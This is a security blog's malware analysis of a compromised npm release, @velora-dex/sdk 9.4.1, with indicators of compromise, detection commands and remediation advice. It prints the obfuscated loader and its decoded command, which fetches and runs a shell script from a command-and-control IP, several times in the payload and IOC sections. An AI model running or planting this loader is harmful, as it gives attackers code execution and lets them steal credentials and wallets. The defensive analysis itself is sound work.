BLOG

Velora (formerly ParaSwap) SDK Version 9.4.1 Compromised And Installing Malware

The npm package @velora-dex/sdk version 9.4.1 contains malicious code that automatically downloads and executes a shell script from a remote server when the

By c0a15726-c5b1-4b0d-85e6-fe15553df9e2 ·

Velora (formerly ParaSwap) SDK Version 9.4.1 Compromised And Installing Malware

During a security audit of multiple versions of the @velora-dex/sdk package, suspicious code was identified in the package entry point (dist/index.js) of version 9.4.1. Further investigation revealed a base64-obfuscated payload that downloads and executes a remote shell script from a command-and-control (C2) server, providing attackers with arbitrary code execution on any system where the package is installed. See the full threat report here.

Impact: The attacker gains arbitrary code execution on the victim's system with the privileges of the Node.js process. This could enable:

  • Cryptocurrency wallet theft

  • Private key exfiltration

  • Environment variable harvesting (API keys, credentials)

  • Backdoor installation

  • Lateral movement within infrastructure

The @velora-dex/sdk package is a popular SDK for interacting with the Velora decentralized exchange (DEX). As a critical infrastructure component in the Web3/DeFi ecosystem, it's used by developers building cryptocurrency trading applications, making it a high-value target for supply chain attacks.

This incident represents a sophisticated supply chain attack targeting the Web3/DeFi ecosystem. The surgical nature of the attack (affecting only a single release version while leaving development builds clean) suggests the attacker had specific knowledge of the release process.

This attack highlights critical vulnerabilities in the npm ecosystem. Build pipeline security remains a weak point. Base64 obfuscation bypasses basic static analysis and automatic code execution on package installation/import is dangerous. Of course, as many know, cryptocurrency-related packages are high-value targets.

Key Findings:

  • Only version 9.4.1 is compromised (out of 15 versions analyzed)

  • Development versions (9.4.1-dev.1, 9.4.1-dev.2) are clean

  • Attack vector suggests build pipeline compromise, not source repository

  • Malicious payload executes automatically on package import

  • C2 infrastructure: IP address 89.36.224.5

  • Remediation version 9.4.2 removed the malicious code

Technical analysis

Malicious Code Location

File: package/dist/index.js (lines 4-5) Version: 9.4.1 only

Obfuscated Payload

const {exec} = require('child_process');
exec(`echo 'bm9odXAgYmFzaCAtYyAiJChjdXJsIC1mc1NMIGh0dHA6Ly84OS4zNi4yMjQuNS90cm91Ymxlc2hvb3QvbWFjL2luc3RhbGwuc2gpIiA+IC9kZXYvbnVsbCAyPiYx' | (base64 --decode 2>/dev/null || base64 -D) | bash`, function(error, stdout, stderr) {});

Deobfuscated Payload

The base64 string decodes to:

nohup bash -c "$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)" > /dev/null 2>&1

Attack Flow

  1. Automatic Execution: Code runs immediately when the package is imported/required

  2. Base64 Obfuscation: Payload is encoded to evade basic static analysis

  3. Cross-Platform Compatibility: Uses both GNU (base64 --decode) and macOS (base64 -D) decode flags

  4. Remote Download: Uses curl to fetch a shell script from the C2 server

  5. Silent Execution: All output redirected to /dev/null to avoid detection

  6. Persistence: Uses nohup to ensure the process continues even if the parent terminates

What Does It Do?

The malicious code performs the following actions:

  1. Spawns a child process using Node.js child_process.exec()

  2. Decodes a base64-encoded command

  3. Downloads a shell script from http://89.36.224.5/troubleshoot/mac/install.sh

  4. Executes the downloaded script with bash

  5. Runs silently in the background with no user interaction required

Velora malware C2 Infrastructure

Primary C2 Server

  • IP Address: 89.36.224.5

  • Protocol: HTTP (unencrypted)

  • Endpoint: /troubleshoot/mac/install.sh

  • Full URL: http://89.36.224.5/troubleshoot/mac/install.sh

Infrastructure Analysis

The path /troubleshoot/mac/install.sh is deliberately crafted to appear legitimate, potentially disguised as a macOS troubleshooting utility. The use of an IP address instead of a domain suggests:

  • Evasion of DNS-based security controls

  • Avoidance of domain registration trails

  • Resistance to domain takedown efforts

Historical Version Analysis

To determine the scope of the compromise, 15 versions of @velora-dex/sdk were analyzed:

Version Range

Versions Tested

Status

9.1.x - 9.3.x

9.1.0, 9.2.0, 9.2.1, 9.3.0-9.3.6

All Clean ✅

9.4.0

9.4.0

Clean ✅

9.4.1-dev

9.4.1-dev.1, 9.4.1-dev.2

Both Clean ✅

9.4.1

9.4.1

MALICIOUS ❌

9.4.2+

9.4.2

Clean ✅

Key Observations

  1. Single Version Attack: Only version 9.4.1 contains the malicious payload

  2. Development Versions Clean: Both 9.4.1-dev.1 and 9.4.1-dev.2 are unaffected

  3. No Historical Compromise: All 10 earlier versions (9.1.0 through 9.3.6) are clean

  4. Rapid Remediation: Version 9.4.2 removed the malicious code

This pattern strongly suggests a build pipeline compromise rather than a source code repository breach.

Attack Timeline (Reconstructed)

Based on package analysis and version history:

Timeline:
---------
[9.1.0 - 9.4.0]     Normal development, all versions clean
        ↓
[9.4.1-dev.1/2]     Development builds created, both clean
        ↓
[BUILD COMPROMISE]  Malicious code injected during 9.4.1 build/release
        ↓
[9.4.1 RELEASE]     Compromised package published to npm registry
        ↓
[DETECTION]         Attack discovered by security researchers
        ↓
[9.4.2 RELEASE]     Remediation version published, malware removed

Attack Vector Hypothesis

The evidence suggests the attacker likely:

  • Did NOT compromise the source code repository (dev versions are clean)

  • DID compromise the build/release pipeline for version 9.4.1

  • Had specific knowledge of the release process

  • Executed a surgical, single-version attack to minimize detection

Possible compromise vectors:

  • Compromised CI/CD credentials or tokens

  • Malicious GitHub Action or build script

  • Compromised maintainer account during release

  • Supply chain attack on build dependencies

Detection & Indicators of Compromise (IOCs)

Network Indicators

IP Address: 89.36.224.5
URL: http://89.36.224.5/troubleshoot/mac/install.sh
Protocol: HTTP/TCP Port 80

File Indicators

Malicious File Pattern:

# Search for malicious base64 payload
grep -r "bm9odXAgYmFzaCAtYyAiJChjdXJs" node_modules/

Package Identifier:

{
  "name": "@velora-dex/sdk",
  "version": "9.4.1"
}

Detection Commands

Check if you have the malicious version installed:

# Check installed version
npm list @velora-dex/sdk

# Search for malicious code in node_modules
find node_modules/@velora-dex -name "index.js" -exec grep -l "bm9odXAgYmFzaCAtYyAiJChjdXJs" {} \;

# Check package.json lock files
grep -A2 "@velora-dex/sdk" package-lock.json yarn.lock 2>/dev/null

Check for network connections to C2 server:

# Check active connections (Linux)
netstat -an | grep 89.36.224.5

# Check firewall/network logs
grep "89.36.224.5" /var/log/syslog /var/log/messages 2>/dev/null

# Check DNS queries (if using resolved)
journalctl -u systemd-resolved | grep "89.36.224"

Immediate Actions Required

If You Have Version 9.4.1 Installed

  1. Isolate the System - Disconnect from network if possible

  2. Remove the Package

``bash npm uninstall @velora-dex/sdk ``

  1. Check for Outbound Connections

``bash netstat -an | grep 89.36.224.5 lsof -i | grep 89.36.224 ``

  1. Review Running Processes

``bash ps aux | grep -E "(curl|bash|nohup)" ``

  1. Rotate All Credentials - Assume all environment variables, API keys, and secrets were exfiltrated

  2. Check Cryptocurrency Wallets - Review for unauthorized transactions

  3. Scan for Persistence Mechanisms - Check crontabs, startup scripts, SSH keys

  4. Install Clean Version

``bash npm install @velora-dex/sdk@9.4.2 ``

For CI/CD Environments

If version 9.4.1 was used in CI/CD pipelines:

  1. Rotate All CI/CD Secrets - API tokens, deployment keys, service account credentials

  2. Audit Recent Deployments - Review all deployments made while 9.4.1 was present

  3. Check for Lateral Movement - Examine logs for unusual access patterns

  4. Update Lock Files - Ensure package-lock.json/yarn.lock specify 9.4.2 or later

  5. Review Build Artifacts - Any containers/artifacts built with 9.4.1 should be considered compromised

Remediation

Update Package Version

Update to version 9.4.2 or later:

# Using npm
npm install @velora-dex/sdk@latest

# Using yarn
yarn upgrade @velora-dex/sdk@latest

# Verify version
npm list @velora-dex/sdk

Pin Safe Versions

Update your package.json to explicitly exclude the malicious version:

{
  "dependencies": {
    "@velora-dex/sdk": ">=9.4.2 <10.0.0"
  }
}

Or use npm/yarn to block it:

# Create .npmrc with blocked version
echo "@velora-dex/sdk@9.4.1=blocked" >> .npmrc

Prevention & Security Recommendations

For Developers

  1. Dependency Pinning - Use exact versions in package.json for critical dependencies

  2. Lock File Integrity - Commit and review package-lock.json/yarn.lock changes

  3. Regular Audits - Run npm audit and security scanning tools regularly

  4. Least Privilege - Run Node.js processes with minimal required permissions

  5. Network Monitoring - Monitor outbound connections from development environments

  6. Checksum Verification - Verify package integrity using npm/yarn checksums

For Organizations

  1. Private Registry - Use a private npm registry with security scanning (Artifactory, Verdaccio)

  2. Dependency Firewall - Implement tools like Snyk, Socket, or GitHub Dependabot

  3. SBOM Generation - Maintain Software Bill of Materials for all applications

  4. Incident Response Plan - Have procedures for supply chain compromise scenarios

  5. Security Training - Educate developers on supply chain attack vectors

  6. Network Segmentation - Isolate build environments from production infrastructure

For Package Maintainers

  1. 2FA Enforcement - Require two-factor authentication for all maintainers

  2. Build Reproducibility - Ensure builds are reproducible and auditable

  3. Code Signing - Sign releases with verified keys

  4. Access Logging - Monitor and log all package publish activities

  5. Automated Scanning - Integrate security scanning in CI/CD pipelines

  6. Provenance Attestation - Use tools like npm provenance or SLSA framework

Community Response & Disclosure

Responsible Disclosure Timeline

  • Detection Date: Undisclosed (based on 9.4.2 release)

  • Vendor Notification: Velora maintainers notified

  • Remediation Release: Version 9.4.2 published

  • Public Disclosure: This analysis

npm Registry Status

As of this writing:

  • Version 9.4.1 should be deprecated on npm

  • Users should be warned against installing this version

  • Maintainers should contact npm security to request version removal

Technical Artifacts

Deobfuscated Malicious Code

A fully deobfuscated and annotated version of the malicious payload has been created for analysis:

Location: extracted/9.4.1/package/dist/index.DEOBFUSCATED.js

This file contains detailed inline comments explaining each step of the attack and should NOT be executed.

Analysis Files

All extracted package versions and analysis artifacts are available in:

VeloraDEX/
├── extracted/
│   ├── 9.1.0/           # Historical version (clean)
│   ├── 9.2.0/           # Historical version (clean)
│   ├── 9.3.*/           # Historical versions (clean)
│   ├── 9.4.0/           # Pre-attack version (clean)
│   ├── 9.4.1/           # MALICIOUS VERSION
│   │   └── package/dist/index.DEOBFUSCATED.js  # Deobfuscated malware
│   └── 9.4.2/           # Remediation version (clean)
└── malware-analysis-report.md  # This document

Final Recommendations

  1. Immediate: Check all systems for version 9.4.1 and remediate

  2. Short-term: Implement enhanced monitoring for npm package integrity

  3. Long-term: Adopt zero-trust principles for dependency management

Indicators of Compromise (IOC) Summary

Package:
  name: "@velora-dex/sdk"
  malicious_version: "9.4.1"
  safe_versions: ["9.4.2", "9.4.0", "<=9.3.6"]

Network:
  c2_ip: "89.36.224.5"
  c2_url: "http://89.36.224.5/troubleshoot/mac/install.sh"
  protocol: "HTTP"
  port: 80

File_Artifacts:
  malicious_file: "node_modules/@velora-dex/sdk/dist/index.js"
  payload_signature: "bm9odXAgYmFzaCAtYyAiJChjdXJs"
  decoded_command: "nohup bash -c \"$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)\" > /dev/null 2>&1"

Behavior:
  - Automatic execution on require/import
  - Outbound HTTP connection to 89.36.224.5
  - Shell script download and execution
  - Background process persistence (nohup)
  - Silent operation (output to /dev/null)

References & Further Reading

Contact & Reporting

If you have been affected by this malicious package or have additional information:

  • Report to npm: security@npmjs.com

  • Report to package maintainers: https://github.com/VeloraDEX/paraswap-sdk/issues

  • Share threat intelligence: [Your security contact info]

Disclaimer: This analysis is provided for educational and defensive security purposes only. The malicious code described should never be executed. Always analyze malware in isolated, sandboxed environments.

License: This analysis may be freely shared and reproduced for security awareness and defensive purposes.